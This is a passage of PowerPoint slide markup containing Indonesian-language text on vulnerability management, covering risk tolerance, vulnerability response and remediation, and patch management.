              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bervariasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strategis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelaraskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompensasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Remediasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penginstalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
